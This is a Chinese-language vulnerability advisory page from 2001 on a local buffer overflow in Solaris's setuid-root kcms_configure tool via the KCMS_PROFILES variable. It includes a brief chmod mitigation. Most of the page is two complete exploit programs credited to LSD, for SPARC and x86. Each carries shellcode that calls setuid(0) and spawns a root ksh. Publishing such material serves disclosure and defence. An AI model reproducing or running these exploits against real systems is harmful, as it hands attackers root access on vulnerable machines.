首页 -> 安全研究
安全研究
安全漏洞
Solaris kcms_configure 缓冲区溢出漏洞
发布日期:2001-04-26
更新日期:2001-04-26
受影响系统:
描述:
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
BUGTRAQ ID: 2605
CVE(CAN) ID: CVE-2001-0595
Solaris所带的配置工具 "kcms_configure" 易于遭受缓冲区溢出攻击,攻击
者可以获取root权限。
kcms_configure使用到环境变量KCMS_PROFILES,而动态链接库kcsSUNWIOsolf.so提
供了对环境变量KCMS_PROFILES的解析功能。如果该环境变量的值超长,运行
kcms_configure时就会发生缓冲区溢出,因为kcms_configure是setuid-to-root的,
本地攻击者将获取root权限。
<* 来源:LSD (contact@lsd-pl.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
LSD了提供两种平台的测试程序
SPARC平台:
/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/
#*/
/*## kcsSUNWIOsolf.so
#*/
#define NOPNUM 940
#define ADRNUM 32
#define PCHNUM 204
char setuidcode[]=
"\x90\x08\x3f\xff" /* and %g0,-1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
;
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char jump[]=
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;
static char nop[]="\x80\x1c\x40\x11";
main(int argc,char **argv){
char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland
//lsd-pl.net/\n");
printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n");
if(argc!=2){
printf("usage: %s xserver:display\n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112;
*((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112;
sprintf(display,"DISPLAY=%s",argv[1]);
envp[0]=buffer;
envp[1]=display;
envp[2]=0;
b=buffer;
sprintf(b,"KCMS_PROFILES=");
b+=14;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}
x86平台:
/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/
#*/
/*## kcsSUNWIOsolf.so
#*/
#define NOPNUM 16000
#define ADRNUM 2900
char setuidshellcode[]=
"\x33\xc0" /* xorl %eax,%eax */
"\xeb\x08" /* jmp <setuidshellcode+12> */
"\x5f" /* popl %edi */
"\x47" /* incl %edi */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x47\x01" /* movb %al,0x1(%edi) */
"\xeb\x0d" /* jmp <setuidshellcode+25> */
"\xe8\xf3\xff\xff\xff" /* call <setuidshellcode+4> */
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3" /* ret */
"\x33\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xe8\xee\xff\xff\xff" /* call <setuidshellcode+17> */
"\xeb\x16" /* jmp <setuidshellcode+59> */
"\x33\xd2" /* xorl %edx,%edx */
"\x58" /* popl %eax */
"\x8d\x78\x14" /* leal 0x14(%eax),edi */
"\x52" /* pushl %edx */
"\x57" /* pushl %edi */
"\x50" /* pushl %eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x92" /* xchgl %eax,%edx */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x42\x08" /* movb %al,0x7(%edx) */
"\xb0\x3b" /* movb $0x3b,%al */
"\xe8\xd6\xff\xff\xff" /* call <setuidshellcode+17> */
"\xe8\xe5\xff\xff\xff" /* call <setuidshellcode+37> */
"/bin/ksh"
;
char jump[]=
"\x8b\xc4" /* movl %esp,%eax */
"\xc3" /* ret */
;
main(int argc,char **argv){
char buffer[20000],*b,adr[4],*envp[4],display[128];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland
//lsd-pl.net/\n");
printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n");
if(argc!=2){
printf("usage: %s xserver:display\n",argv[0]);
exit(-1);
}
*((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000;
sprintf(display,"DISPLAY=%s",argv[1]);
envp[0]=&buffer[0];
envp[1]=&buffer[17000];
envp[2]=display;
envp[3]=0;
b=buffer;
sprintf(b,"xxx=");
b+=4;
for(i=0;i<NOPNUM;i++) *b++=0x90;
for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
*b=0;
b=&buffer[17000];
sprintf(b,"KCMS_PROFILES=");
b+=14;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}
建议:
临时解决方法:
NsFocus建议您在Sun提供官方补丁之前
chmod a-s /usr/openwin/bin/kcms_configure
厂商补丁:
暂无
浏览次数:4017
严重程度:0(网友投票)
绿盟科技给您安全的保障